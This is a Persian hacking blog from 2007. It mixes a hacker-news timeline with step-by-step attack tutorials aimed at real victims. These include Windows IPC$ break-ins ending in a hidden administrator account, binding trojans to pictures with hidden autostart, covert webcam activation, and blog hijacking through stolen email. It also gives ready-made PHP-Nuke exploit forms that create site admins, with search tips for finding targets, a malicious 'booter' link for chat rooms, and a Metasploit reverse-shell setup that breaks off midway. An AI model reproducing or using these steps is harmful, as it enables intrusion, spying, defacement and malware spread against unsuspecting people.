1998
دو هكر در چين به دليل نفوذ به شبكه‌ي كامپيوتري يك بانك و دزديدن مبلغي معادل 31325 دلار محكوم به اعدام مي‌شوند.

1999
"كلينتون" اعلام مي‌كند كه دولت 1.46 ميليارد دلار در FYOO صرف بهبود سيستم امنيت كامپيوتري خواهد كرد.

دسامبر 1999
يك هكر روسي سعي مي‌كند از يك پخش كننده‌ي فروش سي‌دي در اينترنت مبلغ 100هزار دلار اخاذي مي‌كند و براي رسيدن به خواسته‌اش موسسه را تهديد به افشاي شماره‌ي كارت اعتباري مشتريانش مي‌كند. او پس از ناكامي در گرفتن پول، اين شماره‌ها را در يك وب‌سايت در معرض ديد همگان مي‌گذارد.

مارس 2000
"كلينتون" مي‌گويد هيچ‌گاه به دخترش، چلسي، در دبيرستان ايميل نخواهد زد؛ زيرا كامپيوتر را وسيله‌ي امني براي انتقال پيام نمي‌داند.

مه 2000
ويروس "دوستت دارم" با قابليت كپي كردن خود براي هركس از طريق كتابچه‌ي آدرس به سرعت در تمام دنيا پخش مي‌شود.

فوريه 2001
يك هكر هلندي به منظور تنبيه بسياري از كساني كه به ديدن عكس‌هاي غيراخلاقي يك قهرمان تنيس بسيار مشتاق بودند، ويروسي را به همين نام پخش مي‌كند.

فوريه 2001
"آلبرت هانسن" مامور FBI به دليل جاسوسي كامپيوتري براي روس‌ها بازداشت مي‌شود.

آوريل 2001
FBI با حيله دو هكر روسي را مجبور به آمدن به آمريكا مي‌كند. سپس از آن‌ها درباره‌ي نفوذ غير قانوني‌شان به بانك‌هاي آمريكا (در گذشته) اعتراف مي‌گيرد.

مه 2001
تنش بين آمريكا و چين باعث ايجاد آشوب در شبكه‌هاي كامپيوتري توسط هكرهايي از هر دو كشور مي‌شود، كه اين آشوب ششمين جنگ شبكه‌اي در راه دفاع ملي نام مي‌گيرد.

سپتامبر 2001
در صبح يازدهم سپتامبر قوانين جديد ضد تروريسم تصويب شدند. در بسياري از اين قوانين از هكرها به عنوان تروريست ياد شده است.

فوريه 2002
مايكروسافت در بخش "محاسبات قابل اطمينان ابتدايي"، ارتقاي ويندوز را متوقف و 8 هزار برنامه‌نويس را تحت آموزش‌هاي امنيتي قرار مي‌دهد.

مه 2002
كرم "كلز- اچ" ازتمام ويروس‌هاي شناخته شده از نظر تعداد كامپيوترهاي ويروسي شده پيشي مي‌گيرد.

فوريه 2003
ايالات متحده يك هكر اهل قزاقستان را به علت نفوذ غير قانوني به كامپيوترهاي "بولومبرگ" و اقدام به اخاذي محكوم مي‌كند.
+ نوشته شده در  چهارشنبه سیزدهم تیر 1386ساعت 8:25  توسط پیمان  | 
هک ویندوز xp ,2000
يكي از مشكلات بزرگ ويندوز كه در Service pack هاي ويندوز هم وجود داره IPC هست

حالا ما با استفاده از اين روش كارمون را شروع ميكنيم .

يكي از نرم افزار هاي مورد نياز GFI:LANguard Security Scaner هست كه بخاطر قدرت و كارايي اين برنامه را پيشنهاد ميكنم كه فقط بايد يكسري

تغييرات رو روي آن انجام بدين اين برنامه را از سايت زير داونلود كنيد:
http://www.kyzj.com/

Serial:6J7FF-OL03J-9OHQB-1Q0XZ-F7PLZKH5TY-K1GSN-7BT5F-78A0B-CSKYU

البته ورژن 3.3 هم هست ولي من ورژن 3.2 را پيشنهاد ميكنم كه در سايت بالا ورژن 3.2 وجود دارد و سريال بالا نيز مربوط به همين ورژن هست

حالا بايد يكسري تغييرات در اين برنامه بديم .

1.option را انتخاب كنيد و به قسمت Scanning برويد و اين شاخه را انتخاب كنيد Configure ports و حالا در قسمت

Port number/range:1025

port desciription:network blackjacket

و حالا ADD PORT را بزنيد .

در قسمت New scan بايد يك Range اي پي رو اسكن كنيد تا يك اي پي با مشخصات زير پيدا شود

پرت هاي باز 1025,139 را داشته باشد .

IPC share نيز داشته باشد

حالا بايد به اين اي پي به صورت زير كانكت شويد :

1.در قسمت Run اين جمله را وارد كنيد CMD

2. دستور زير را وارد كنيد :

Net use IpadressIPC$""/user:Administrator

اگر دستور زير را دريافت كردين

Successfully The Command was completed

از اي پي مورد نظر Share گرفتين و در اختيار شماست اما در غير اينصورت Share داراي پسوورد ميباشد كه من براي كرك كردن پسسوورد از اين برنامه

استقاده ميكنم :

PQWAK

كه اين برنامه رو از سايت Download.com دريافت كنيد .

بعد از كرك از پسوورد بدست آمده اينگونه استفاده كنيد

Net use ipadressIPC$ "password"/user:administrator

در صورتيكه ميخواهيد با Telnet كانكت شويد مراحل زير را طي كنيد .

در قسمت RUN تايپ كنيد Regedit

به اين آدرس برويد HKEY_LOCAL_MACHINE--Software--Microsoft--Telnet NTLMServer--1.0

حالا Value date اين فايل رو به اين جمله تغيير دهيد : 12

در قسمت بعدي به RUN برويد و اين دستور را تايپ كنيد TELNET

دستور زير را وارد كنيد Telnet ipadress

در ادامه اگر از شما يوزر و پسوورد خواست يوزر را Administrator و پسسورد را خالي بگذاريد

حالا احتياج به ساختن يك يوزر براي خود داريد . اين دستور را در ادامه وارد كنيد :

Net user username password/add

حالا براي قرار دادن يوزر خود در گروه ادمين ها اين دستور را وارد كنيد

Net groups Administrators username/add

تمام شد شما به هدف خود رسيده ايد اما من براي تازه كارها روش اول را پيشنهاد ميكنم

ولي دوستان ديگر ميتوانند از Telnet استفاده كنند

نكته : من هيچ مسئوليتي در مورد تغيير رجيستري نميپذيرم اگر شما قادر به Edit رجيستري نيستيد بهتره از آن يه Backup تهيه كنيد يا

در نهايت از روش اول استفاده كنيد
+ نوشته شده در  چهارشنبه سیزدهم تیر 1386ساعت 8:24  توسط پیمان  | 
telnet کردن پورت و بدست آوردن ip

از ميان پورت‌ها شماره‌های ۷، ۱۵، ۲۱، ۲۳، ۲۵، ۷۹، ۸۰، ۱۱۰و ۱۱۹ فعلا برای ما مهم‌ترند و به‌تدريج با آنها آشنا خواهيد شد.

 

◊ چگونه به يک پورت Telnet کنيم؟

 

برای اينکه عملکرد يک پورت برای شما روشن شود، بايد به آن پورت Telnet کنيد. (البته معمولا تعدادی از پورت‌هايی را که ممکن است اطلاعاتی مهم را در اختيار هکر‌ها قرار دهند مثل پورت ۷۹ معمولا بسته است و ارتباط با آنها شايد برقرار نشود.) برای telnet کردن در command prompt دستور زير را تايپ کنيد:

telnet hostname portnum

در اين دستور به‌جای hostname شماره ip و يا نام سايت را وارد می‌کنيد و به‌جای portnum شماره پورت و يا معادل آن از جدول. مثلا برای تلنت کردن به پورت ۱۳ که ساعت و تاريخ را به‌دست می‌دهد در کامپيوتری به‌اسم www.iums.ac.ir مي‌نويسيد:

telnet iums.ac.ir 13

telnet iums.ac.ir daytime

هر دو اين دستورات معادل هم هستند.

تلنت کردن معمولا اولين کاری است که يک هکر برای هک کردن يک سايت انجام می‌دهد، زيرا بعضی از پورت‌ها در صورت بسته نبودن روی آن سرور، معمولا حاوی اطلاعات بسيار مهمی هستند.

همين الان شروع کنيد و مثل يک هکر واقعی به کامپبوتر‌های مختلف و پورت‌های گوناگون تلنت کنيد. مخصوصا اگر پورت ۷۹ (finger) روی يک کامپيوتر باز بود، مرا هم خبر کنيد .

چون معمولا پمرت ۷۹ بسته است پورت ۲۱ را امتحان کنید.

پیدا کردن ip یک سایت بادانستن آدرس آن:

دستور ping را در command prompt صادر کنيد:

ping domain

در اين حالت می‌توانم ip آن سايت را ملاحظه کنم. (البته کار اصلی ping يک چيز ديگست و ميشه گفت داريم ازش سوءاستفاده می‌کنيم). مثلا برای پيدا کردن ip سازين می‌نويسم:

ping sazin.com

و جواب می‌شنوم:

Pinging sazin.com [63.148.227.65] with 32 bytes of data:

 

Reply from 63.148.227.65: bytes=32 time=821ms TTL=111

Reply from 63.148.227.65: bytes=32 time=821ms TTL=111

Reply from 63.148.227.65: bytes=32 time=822ms TTL=111

Reply from 63.148.227.65: bytes=32 time=811ms TTL=111

 

 

Ping statistics for 63.148.227.65:

Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),

Approximate round trip times in milli-seconds:

Minimum = 811ms, Maximum = 822ms, Average = 818ms

+ نوشته شده در  چهارشنبه سیزدهم تیر 1386ساعت 8:23  توسط پیمان  | 
با این پورت مطالب باحالی از سایت مورد نظر بدست آورید

با پورت ۸۰ صحبت کنيم

 

پورت ۸۰ يکی از مهم‌ترين پورت‌هاست. دنيای وب (صفحات اينترنتی) بر اساس همين پورت کار می‌کنه. توضيح اينکه وقتی به يه سايت وصل می‌شيم و صفحه وب را درخواست می‌کنيم، در واقع مرورگر اينترنتی به پورت ۸۰ اون کامپيوتر وصل می‌شه و اطلاعات رو می‌گيره (البته بعد از گرفتن اطلاعات اون رو تفسير می‌کنه و به صورت يه صفحه نشون می‌ده - دقت کنيد که اطلاعات در واقع به صورت يک سری تگ HTML است ). حالا ما می‌خواهيم با پورت ۸۰ يک کامپيوتر صحبت کنيم ولی به کمک telnet و nc.

اول بايد يه connection (اتصال) با پورت ۸۰ برقرار کنيم (مثلا برای سايت hotmail.com بايد بنويسم):

telnet www.hotmail.com 80

حالا بايد شروع به صحبت با پورت ۸۰ کنيم. من فعلا دو تا جمله براتون می‌گم و بقيه‌اش بمونه واسه بعد. دقت کنيد که موقع کار با پورت ۸۰ دستوراتی که ما می‌نويسيم، نمايش داده نمی‌شود ولی کار می‌کنه.

۱- اولين جمله اينه: GET / HTTP/1.0 و بعدش دوتا Enter

به فاصله‌ها دقت کنيد. دو طرف / ی که بعد از GET است، فاصله وجود دارد. اين جمله به پورت ۸۰ می‌گه که هرچی در header داره، نشون بده. و جواب می‌شنوم:

HTTP/1.0 302 Moved Temporarily

Server: Microsoft-IIS/5.0

Date: Thu, 05 Dec 2002 12:02:51 GMT

Location: http://lc2.law5.hotmail.passport.com/cgi-bin/login

X-Cache: MISS from cache5.neda.net.ir

Connection: close

 

۲- دومين جمله اينه: GET / what/ever و بعدش دوتا Enter

به فاصله‌ها دقت کنيد. اين دستور باعث ميشه که هر چی داره، رو کنه.

+ نوشته شده در  چهارشنبه سیزدهم تیر 1386ساعت 8:22  توسط پیمان  | 
با هر چندتا آیدی که دوست دارید وارد yahoo بشید
اول برنامه را اجرا کنید

بعد در قسمت    باید آدرس جایی که یاهو را در آنجا نصب کردید رو بدید وسپس روی Crack It!  کلیک کنید البته باید توجه داشته باشید که

 Yahoo Messenger  روی صفحه Desktop  و حتی در پایین کنار ساعت هم نباشه.( البته این برنامه برای یاهو مسنجر های قدیمی است و برای یاهو

 مسنجر 6 نمی باشد )

ولی برای یاهو 6 نیز ابتدا برنامه زیر را اجرا :

ودر قسمت    باید آدرس جایی که یاهو شما در آنجا نصب است را داد و بعد گزینه start را بزنید .

+ نوشته شده در  دوشنبه یازدهم تیر 1386ساعت 10:53  توسط پیمان  | 
آموزش قاطی کردن عکس با تروجان و هر چیز دیگر
خوب یه exebinder خوب براتون آموزش میدم که میتونی بی نهایت فایل رو با هم قاطی کنی و هم می تونید طریقه باز شدن و فعال شدن یا نشستن و کجا کپی

بشه را هم خودتون میتونید تعیین کنید و همچنین یکی دیگر از امکانات آن نیز این است که میتونید آیکون فایل رو به دلخواه انتخاب کنید.

اول برنامه را اجرا کنید :

با زدن دکمه add می توانید به ترتیب هر چند تا فایل که دوست دارید مخلوط بشود را انتخاب کنید

بعد از add کردن هر فایل تنظیمات فایل را به شکل زیر تغییر دهید :

opening state: hide . normal


copy to : windows


action : open/execute


register start: yes

بعد از اعمال تنظیمات می توانید یه آیکون به سلیقه خود تون برای فایل انتخاب کنید.

در قسمت icon دکمه change را بزنید و فایل آیکون را انتخاب کنید توصیه اینکه این آیکون نباید حجمش بالاتر از 766 kb  باشد ( آمزش کندن آیکون برنامه ها و حتی عکس ها گفته شده است ) ولی کنار برنامه فولدری وجود دارد که درون آن حدود 80 - 90 تا آیکون وجد دارد که کفاف کار ما را می دهد ولی حتما آیکون 46 آن را ببینید که من فکر می کنم از این بهتر آیکون دیگه وجود نداره در آخر هم بر روی دکمه bind کلیک کنید و فایل را با پسوند exe ذخیره کنید مثلا Bamzi.exe

+ نوشته شده در  دوشنبه یازدهم تیر 1386ساعت 10:52  توسط پیمان  | 
نامرئی کردن ایکون فولدرها یا فایلهایی مثل تروجانها

برای فولدر ها اگر از ویندوز ایکس پی استفاده میکنید  :


روی پوشه مورد نظرتون راست کلیک کنید وبعد properties رو انتخاب کنید.به قسمت CUSTOMIZE برید و دکمه change icon رو بزنید

یه پنجره با سی چل تا ایکون ظاهر میشه بیخیال اونا .. دکمه BROWSE رو بزنید و ایکونی که  آدرس آن را در پایین داده شده است رو انتخاب کنید و بعد اون اوکی کنید . تمام .


سر فایلها هم میتونید همچین بلایی بیارید... اگر فایلتون تروجان باشه .اکثر ادیتور ها امکان انتخاب ایکون رو بهتون میدن .فقط کافیه شما ادرس ایکون رو مشخص کنیدو در مورد فایلی که به هر دلیلی نمیتونید یا اجازه نمیده که ایکونش رو عوض کنید توصیه میکنم از بیندرها استفاده کنید .

+ نوشته شده در  دوشنبه یازدهم تیر 1386ساعت 10:51  توسط پیمان  | 
روشن کردن وب کم طرف به صورت مخفی
۱. در اين قسمت نام آيدی شخص را بنويسيد

۲. با کليک کردن در اين قسمت شخص را ببينيد

۳. ايست برنامه

۴. ديدن بهتر کيفيت تصوير

۵. ايست ديدن بهتر ۶.در باره برنامه

+ نوشته شده در  دوشنبه یازدهم تیر 1386ساعت 10:50  توسط پیمان  | 
با این روش هیچ وقت ایدی شما هک نمیشه

شما اگه يه كم حواستون جمع باشه هيچ وقت ايديتونو از دست نميديد اونم خيلي سادس و اگه ايديتون هك شده ميتونيد همين حالا پسوردشو پيدا كنيد كه بستگي به همون حواس جمعي خودتونه همون طور كه ميدونيد در هنگام گرفتن اي دي از شما سوالاتي ميشه از جمله


zip code
secret guestion
country


و تاريخ تولد حالا اگه شما موقع ثبت نام اينارو يادتون بمونه اگه حتي كسي پسوردتونو پيدا كنه و عوض كنه شما كافيه بهwww.mail.yahoo.comبريد و روي  forget password كليك كنيد كه همون سوالاتي كه در بالا به اونا اشاره شد ازتون ميپرسه جواب بديد بعد خود ياهو پسورد ايدي شما رو عوض ميكنه و پسورد جديدي بهتون ميده اميد وارم با اين روش شما ايديهاي از دست رفتتونو به دست بیارید.

+ نوشته شده در  دوشنبه یازدهم تیر 1386ساعت 10:48  توسط پیمان  | 
بالا بردن سرعت مودم و كم شدن ديسكانكت ها

ابتدا باید مراحل زیر را طی کنید :

start /  run  / win.ini                   
رو از ويندوز ييدا كنيد و بعد
[ports]
رو ييدا كنيد و كام مودمتونو ييدا كنيد و به جاى
(96000n,8,1,x)
عبارت
921600,n,8,1,p
رو تايب كنيد و سيو كنيد اميدوارم مورد استفاده قرار كيرد

+ نوشته شده در  دوشنبه یازدهم تیر 1386ساعت 10:47  توسط پیمان  | 
شکل ياهوی خود را عوض کنيد

۱.برين به ياهو مسنجرتون و اين کارهايی که می گم رو پله به پله انجام بدين برين توی  login  بعد برين توی pereferences  بعد برين توی appearance  بعد يک تکست به نام   current theme می بينيد که جلوش گزينه هايی است که قابل تغيير است آن را روی حالت custom قرار داده وok  را بزنيد....

+ نوشته شده در  دوشنبه یازدهم تیر 1386ساعت 10:47  توسط پیمان  | 
بی نام کردن فایل
برای اینکار هم خیلی راحت روی فایل راست کلیک کنید rename رو بزنید alt رو پايين نگه داريد و با قسمت num که ميشه قسمت سمت راست

 کيبورد عدد 0160 را تايپ کنيد بعد alt رو ول کنيد .نکته:اگر جواب نداد عدد 255 رو امتحان ( alt+255 ) کنید

+ نوشته شده در  دوشنبه یازدهم تیر 1386ساعت 10:44  توسط پیمان  | 
هک کردن وبلاگ

برای این کار باید اول ایمیل شخصی که در آن وبلاگ می نویسد را بدست آورد که برای این کار  وارد آن وبلاگ شوید و به دنبال پست الکترونیک می گردیم  که در سمت چپ یا راست وبلاگ  قرار دارد و بعد آن باید آن ایمیل یا همان آیدی را هک کرد و پسورد آن را بدست آوریم  ( با استفاده از آموزش هایی  که داده شده است )  را هک کنیم   bamzi123.blogfa.com حالا ما فرض می کنیم که می خواهیم می شویم و در زیر قسمتی که باید کلمه عبور و شناسه کاربری را وارد کرد  blogfa ابتدا وارد سایتیه گزینه دارد که نوشته شده : کلمه عبور خود را فراموش کرده ام و آن را می زنیم و از ما شناسه کاربری و ایمیل می خواهد که شناسه همیشه همان اسم وبلاگ می باشد و ایمیل هم همان ایمیلی که در وبلاگ گفته شده است را وارد می کنیم و پسورد دوباره  به آن ایمیل فرستاده می شود و ما که آن ایمیل را از قبل هک کرده ایم و پسورد آن را داریم و وارد ایمیل شده و پسورد وبلاگ که فرستاده شده را بر می داریم .

+ نوشته شده در  دوشنبه یازدهم تیر 1386ساعت 10:44  توسط پیمان  | 
ويروس بوت

اين ويروس تا وقتی اجرا نشه به کسی صدمه ای نمی زنه پس چون شما می دونيد که اينطوريه اون رو اجرا نميکنيد و ياهو هم اين ويروس رو  نمی شناسه پس به کار مياد چون می تونين برای ديگران پست کنيد .اين ويروس رو هم خودم با برنامه ی  visual basic 6 نوشتم  .اين آدرس پايين رو کپی بگيرين و توی قسمت آدرس internet explore پست کنيد  nikonam.0catch.com/booter.exe شما میتونید به اول اون  www اضافه کنید ودر چت روم ها یا در صفحه pm تایپ کنید و هر کسی بر روی اون کلیک کرد و فایل را گرفت  بوت بشه.

www.nikonam.0catch.com/booter.exe

+ نوشته شده در  دوشنبه یازدهم تیر 1386ساعت 10:39  توسط پیمان  | 
ساخت پروفایل
برای این کار که یکی از ساده ترین امکانات یاهو می باشد شما می بایستی در صفحه ی اصلی یاهو مسنجر روی منوی file کلیک و زیر منوی edit my profile و در کادر باز شده new profile را انتخاب کنید و در سایت باز شده نیز edit new profile را انتخاب کنید و در فرم باز شده تنها اولین فیلد را پر کنید با نامی که می خواهید id شما باشد .شما اجازه ی کار را برای رسیدن به 5 id دارید و با این کار شما یک id ساخته اید که می توانید با آن ها به یک نفر پیام دهید به طور همزمان به این صورت که در قسمتی از پی ام که نام شما را نوشته اجازه عوض کردن آن و تبدیل آن به id پرفایل داده می شود .
+ نوشته شده در  دوشنبه یازدهم تیر 1386ساعت 10:37  توسط پیمان  | 
جلوی ای دی خود در مسنجر با رنگ آبی بنويسيد

کافيست در جلوی وضعیت خود دو کاراکتر اضافه کنيد. اولين کاراکتر را با

اضافه کنيد که کاراکتر به دست آمده شبيه خط فاصله ميباشد. کاراکتر دوم هم / ميباشد

به عنوان مثال اگر بخواهيد جلوی وضعیت خود سلام با رنگ آبی بنويسيد کافيست به شرح زير عمل نماييد


SALAM(alt+0160)/

که شکل آن به اين صورت در مي آيد

SALAM /

حالا اگر باز هم متوجه نشده ايد کافيست جمله بالا را در وضعیت خود کپی و پيست نماييد

+ نوشته شده در  یکشنبه دهم تیر 1386ساعت 13:49  توسط پیمان  | 
پيدا کردن ip طرف مقابل هنگام chat با yahoo messenger

به اينترنت دارد و فرضا دارد با شما dial-upمی‌خواهيم درباره يک کلاينت مثلا کسی که مثل شما يک اتصال مثلا chat می کند ، کسب اطلاعات کرد .
در اين مورد هم اولين نکته‌ای که بايد کشف شود ip اوست. در اين جلسه می‌خوام بهتون ياد بدم که وقتی با يه نفر از طريقyahoo messenger به صورت pm چت می کنید ، چطوری می تونید ip اش رو پيدا کنيد. البته بايد توجه کرد که اين روش گاهی کار نمی‌کند. نيز فرض می‌کنم که فقط با يک نفر داريد چت می‌کنيد.

( در command prompt ) می توانید در run حرف cmd را تایپ کنید تا صفحه ظاهر شود .

يکی از دستور‌های زير را تايپ می‌کنيد:

netstat -n

netstat

دستور اولی برای پيدا کردن ip طرف مقابل است و دستور دوم گاه می‌تواند اسم کامپيوتر او را برای شما نشان دهد.

من دستور netstat -n را تايپ کردم و به نتايج زير رسيدم:

Active Connections

Proto Local Address Foreign Address State

TCP 195.219.176.126:1296 66.163.173.77:5050 ESTABLISHED

TCP 195.219.176.126:1341 66.218.75.149:80 LAST_ACK

TCP 195.219.176.126:1325 212.234.112.74:5101 SYN_SENT

اولين کاری که می‌کنيد اين است که سطری را پيدا می‌کنيد که در local address یا foreing address آن، پورت 5101 یا 5050 داشته باشد. در اين مثال سطر آخر، سطر مورد نظر ماست. زيرا در ستون foreing address از سطر آخر، پورت آن 5101 است . البته اگر در ستون local address هم بود باز هم فرقی نمی‌کرد. وقتی آن سطر را پيدا کرديد، ip طرف مقابل را از ستون foreing address از همان سطر پيدا می‌کنيم. در اين مثال ip طرف مقابل 212.234.112.74 است .

اگر به‌جای netstat -n از netstat استفاده می‌کردم، به نتايج زير می‌رسيدم:

Active Connections

Proto Local Address Foreign Address State

TCP artawill...:1296 cs55.msg.sc5.yahoo.com:5050 ESTABLISHED

TCP artawill...:1298 dl3.yahoo.com:http TIME_WAIT

TCP artawill...:1325 Majid:5101 SYN_SENT

ملاحظه می‌فرماييد که همه ip ها به معادل های اسمی تبديل شده‌اند و در مورد همان سطر آخر به جای ip طرف مقابل اسم کامپيوتر فرد را می‌نويسد (البته در حالتی که طرف مقابل dial-up نباشد، قضيه فرق می‌کند.)

حالا فرض کنيد که يک pm ديگر هم اضافه می‌شود. و دوباره دستور netstat -n را تايپ می‌کنم. حالا نتايج زير را می‌بينم:

Active Connections

Proto Local Address Foreign Address State

TCP 195.219.176.126:1296 66.163.173.77:5050 ESTABLISHED

TCP 195.219.176.126:1344 64.58.77.197:80 ESTABLISHED

TCP 195.219.176.126:5101 212.234.112.74:3735 ESTABLISHED

TCP 195.219.176.126:5101 194.225.184.95:1460 ESTABLISHED

الان دوتا سطر دارم که دارای پورت 5101 باشد، و چون می‌دانم که 212.234.112.74 مربوط به نفر قبلی بود،

پس 194.225.184.95 مربوط به دومی استpm.

+ نوشته شده در  یکشنبه دهم تیر 1386ساعت 13:35  توسط پیمان  | 
آموزش هك سايتهای Php Nuke
سلام خدمت تمامی دوستان خیلی ها دوست دارن سایت هک کنن ولی به علتهای مختلف یا نمیتونن وقت بزارن روش یا سایت امنیتش بالاست یا فرد دانش هک کردن رو نداره و...

به نظر من ساده ترین راه هک کردن و دیفیس کردن سایتها استفاده از باگ های phpnuke هست که به شما اجازه میده به ساده ترین راه به سایت نفوذ کنید..

من برای شما دوستان میخوام چند تا باگ جدید رو بزارم تا ازشون استفاده کنین.
برای شروع به گوگل برید (www.google.com) و بعد باید دنبال سایت هایی که از سیستم phpnuke استفاده میکنن بگردید , شاید بگید چه جوری؟
برای این کار کافیه این نوشته رو کپی و پیست کنید.
كد:
modules.php?name=Downloads

این ماژول در تمامی ورژن های php nuke وجود داره.
خوب بعد از این کار گوگل کلی سایت که از سیستم phpnuke استفاده میکنن میاره
برید رویه یکی از لینکها کلیک کنید وقتی سایت باز شد باید ببینید که شاخه phpnuke چیه
ممکنه به این شکلها باشه:
كد:
http://www.sitename.com/phpnuke/mod...?name=Downloads www.sitename.com/html/modules.php?name=Downloads http://www.sitename.com/portal/modu...?name=Downloads www.sitename.com/modules.php?name=Downloads

برای اینکه بتونیم از این روش سایتها رو هک کنیم باید فایل admin.php رو سایت باشه
برای اینکه بدونین هست یا نه
كد:
modules.php?name=Downloads

اینو پاک کنین و جاش بنویسید admin.php
مثلآ:
كد:
www.sitename.com/admin.php

اگه صفته وارد کردن نام کاربری و پسورد اومد یعنی وجود داره و اگه هم با Error برخورد کردید معلوم میشه که مدیر سایت فایل admin.php رو برداشته.
اگه admin.php بود که به مرتله بعدی میرید اگر هم نبود اون سایت رو بی خیال شید.

خوب تالا ما فرض میکنیم که admin.php وجود داره.

من به شما چند تا باگ میدم که از طریق اونا شما بتونین به سیستم مدیریت سایت نفوذ کنید و به راتتی بتونین سیستم مدیریت سایت رو به دست بگیرید.

شما برای اجرای این کد ها Notepad رو باز کنید کد رو داخلش بنویسید و از منویه File گزینه Save As.. رو انتخاب کنید و هر کجا که میخواین با نام دلخواه تون Save کنید البته بعد از اینکه نام فایل رو نوشتید پسوند اونو .HTML بزارید.

بعد فایلتونو داخل Notepad باز کنید و به جای [sitename] آدرس سایتی رو که میخواین هک کنین رو بنویسید.


کد اول: با استفاده از این میتونین داخل سایت یه کاربر با امکانات ادمین سایت ایجاد کنید و سپس
وارد سیستم مدیریت سایت بشید و سایت رو هک کنید.
كد:
<form name="mantra" method="POST" action="http://www.sitename.com/admin.php"> USERNAME: <input type="text" name="add_aid"><br> NOME: <input type="text" name="add_name"><br> PASSWORD: <input type="text" name="add_pwd"><br> E-MAIL: <input type="text" name="add_email"><br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"><br> <input type="hidden" name="add_radminsuper" value="1"><br> <input type="hidden" name="op" value="AddAuthor"></p> <input type="submit" name="Submit" value="Create Admin"><br> </form>


کد دوم: با این کد میتونین یه خبر رو بدونه ورود به سیستم مدیریت به سایت بفرستید.

كد:
<form name="mantra" method="POST" action="http://www.sitename.com/admin.php"> <p>TITLE: <input type="text" name="add_title"> <br> CONTENT: <textarea name="add_content" rows=10 cols=50></textarea> <br> DATE: <input type="text" name="add_mdate"> <br> E-MAIL: <input type="text" name="add_expire"> <br> <input type="hidden" name="add_expire" value="0"> <br> <input type="hidden" name="add_active" value="1"> <br> <input type="hidden" name="add_view" value="1"> <br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"> <br> <input type="hidden" name="add_radminsuper" value="1"> <br> <input type="hidden" name="op" value="addmsg"> </p> <p> <input type="submit" name="Submit" value="Post this message"> <br> </p>

کد سوم: این کد هم تقریبآ مثل کد بالا عمل میکنه.
كد:
<form name="mantra" method="POST" action="http://www.sitename.com/admin.php"> <p>TITLE: <input type="text" name="title"> <br> CONTENT: <textarea name="content" rows=10 cols=50></textarea> <br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"> <br> <input type="hidden" name="add_radminsuper" value="1"> <br> <input type="hidden" name="op" value="massmail_send"> </p> <p> <input type="submit" name="Submit" value="Send to target site newsletter"> <br> </p> </form>

خوب اینم از آموزش هک کردن سایتهای popnuke از این روش

امیدوارم به کارتون بخوره

اگه کسی روش دیگه ای بلد هست اینجا بگه ممون

راستی اگه می خواین سایت های ایرانی که از php nuke استفاده می کنند را پیدا کنید کافیه

به googel برید و عبارت Farsi project by PHP-Nuke را بنویسید .

+ نوشته شده در  یکشنبه دهم تیر 1386ساعت 13:31  توسط پیمان  | 
دریافت دعوت نامه Gmail ظرف چند دقیقه
مدت زمان زیادی است که گوگل سرویس ایمیل خود را با حجمی بیش از 2 گیگابایت راه اندازی نموده است. Gmail نام این سرویس است که از مزایای زیادی نسبت به سرویس ایمیل یاهو برخوردار است. اما مشکل اصلی که Gmail برای کاربران دارد نیاز به داشتن یک دعوت نامه از جانب شخصی است که قبلأ در Gmail عضو بوده است. این موضوع باعث شده است که بسیاری از کاربران از داشتن این سرویس ایمیل محروم بمانند. همچنین پیدا کردن دوستی که برای شما دعوت نامه بفرستد نیز کار ساده ای نیست. اما در این ترفند قصد داریم یک راه حل بسیار ساده را به شما پیشنهاد کنیم. با استفاده از این ترفند شما میتوانید در عرض چند دقیقه به طور اتوماتیک دعوت نامه Gmail خود را دریافت نمایید! بدون اینکه از شخصی درخواست دعوت نامه بکنید.

برای این منظور:
کافی است به آدرس http://gmail.afraid.org  بروید.
پس از باز شدن صفحه در فضای جلوی عبارت :Email ، ایمیلی که میخواهید دعوت نامه به آن ارسال شود را وارد نمایید.
سپس روی دکمه Submit کلیک نمایید.
اکنون شما باید شکیبا باشید تا دعوت نامه به ایمیل شما ارسال گردد.

چند نکته:
ایمیلی که دعوت نامه را برایتان ارسال میکند با موضوع Gmail Invites میباشد.
ارسال کننده ایمیل ، ایمیلی به نشانی kv9999@gmail.com و شبیه به این دارد.
در صورتی که دعوت نامه پس از مدت زمان زیادی برایتان ارسال نشد مجدد ایمیل را وارد نمایید.
نهایتأ بین 5 تا 15 دقیقه طول میکشد تا دعوت نامه ارسال گردد.
اگر ایمیل را دریافت نکردید ، پوشه های Bulk یا Spam را در ایمیل خود چک کنید.
پس از باز کردن میلی که حاوی دعوت نامه است روی لینک موجود در آن کلیک کنید تا به صفحه عضویت Gmail بروید.
دقت کنید Desired Login Name نام کاربری شماست و عبارت موجود را پاک نمایید ، همچنین ایمیل موجود در Secondary email را نیز پاک نموده و ایمیل دوم خود را بنویسید.

موفق باشید نظر یادتون نره

+ نوشته شده در  یکشنبه دهم تیر 1386ساعت 13:28  توسط پیمان  | 
هک از طریق چت بدون ازسال فایل...
 
در متدی جدید که با باگ موجود در Windows Fax Viewer کار می کند . شما لینکی برای قربانی در چت روم می فرستید و بعد از کلیک کردن آن لینک توسط قربانی به شما از وی Shell ( قابلیت کنترل کامل کامپیوتر وی) میگیرید نوع Shell در این روش از نوع Reverse می باشد و فابلیت عبور از ّFirewall را دارا ست .ابزار لازم در این کار همان Metasploit است که مجموعه باگ هاو ابزار های نفوذ می باشد که قبلآ نحوه ی کار و دستورات آن در سایت آموزش داده شده لینک دریافت -  لینک اموزش کار توجه : اگر قبلآ نسخه Metasit framework-2.4 را دریافت کرده اید این باگ هنوز به آن اضافه نشده و شما بایستی در پوشه برنامه MSFupdate را بزنید تا باگ های جدید مانند ie_xp_pfv_metafile به آن اضافه شود. برای کنترل صحت update می توانید بعد از اجرای برنامه دستور show exploits را بزنید و لیست باگ ها را مشاهده و با دستور use از آن ها استفاده کنید بنابراین تایپ می کنید use ie_xp_pfv_metafile حال شما این exploit را اجرا کرده اید و بایستی یک سری مقادیر را به برنامه بدهید مانند ip شما و پورت کاربردی . نوع سیستم عامل قربانی . نوع payload (ارتباط ) . دراین با فرض اینکه ip من http://217.216.30.40 باشد به برنامه مقدار دهی میکنم . بزنید set TARGET 0 و بعد آن
بزنید set PAYLOAD win32_reverse و بعد ان
بزنید set HTTPHOST 217.216.30.40 و بعد آن
بزنید set LHOST 217.216.30.40
